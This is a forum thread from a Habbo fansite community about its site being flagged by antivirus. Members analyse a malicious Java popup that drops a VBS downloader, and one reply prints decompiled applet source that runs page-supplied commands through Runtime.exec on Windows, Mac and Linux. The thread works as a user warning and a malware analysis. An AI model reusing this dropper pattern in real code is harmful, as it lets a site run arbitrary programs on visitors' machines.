AVG most likely blocked it for you, the site's not very interesting to be fair. no pages worktried going through them all

AVG most likely blocked it for you, the site's not very interesting to be fair. no pages worktried going through them all
I tried looking at the events. I need to know if there is any events going on.![]()
Joined Habbox Forum: 16-02-2010
Former HabboxLive Senior DJ
Former Content Staff
Former Articles Staff
Hannah is bae
Yeh that's defiantly not possible as the habbox.com domain is messed atm, well is for my provider may not be for yours
It's actually pretty easy to get on the main site if you really need it for some reason http://146.185.20.107/#!/Home
Chippiewill.
I've been looking into the Java popup used on their site.
It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.
A further problem made 10x worse by Habbox's owners being inactive, how many times to people need to say it GIVE xxMATTGxx ACCESS TO THE LOT.
"You live more riding bikes like these for 5 minutes than most people do in their entire lives"
RIP Marco Simoncelli ~ 1987 - 2011
Previous Habbox Roles: Shows Manager, Help Desk Manager, Forum Moderator, Forum Super Moderator, Assistant Forum Manager, Forum Manager, Assistant General Manager (Staff), General Manager.
Retired from Habbox May 2011
There is no java exploit. Here is the decompiled code:
Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.Code:import java.applet.Applet; import java.io.IOException; public class Client extends Applet { public void init() { String window1 = getParameter("windows1"); String windows2 = getParameter("windows2"); String linux1 = getParameter("linux1"); String linux2 = getParameter("linux2"); String unix1 = getParameter("unix1"); String unix2 = getParameter("unix2"); String os = System.getProperty("os.name").toLowerCase(); if (os.indexOf("win") >= 0) { try { Process w1 = Runtime.getRuntime().exec(window1); w2 = Runtime.getRuntime().exec(windows2); } catch (IOException e) { Process w2; e.printStackTrace(); } } if (os.indexOf("mac") >= 0) { try { Process u1 = Runtime.getRuntime().exec(unix1); u2 = Runtime.getRuntime().exec(unix2); } catch (IOException e) { Process u2; e.printStackTrace(); } } if (os.indexOf("lin") < 0) { return; } try { Process l1 = Runtime.getRuntime().exec(linux1); l2 = Runtime.getRuntime().exec(linux2); } catch (IOException e) { Process l2; e.printStackTrace(); } } }
I've been looking into the Java popup used on their site.
It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.
Want to hide these adverts? Register an account for free!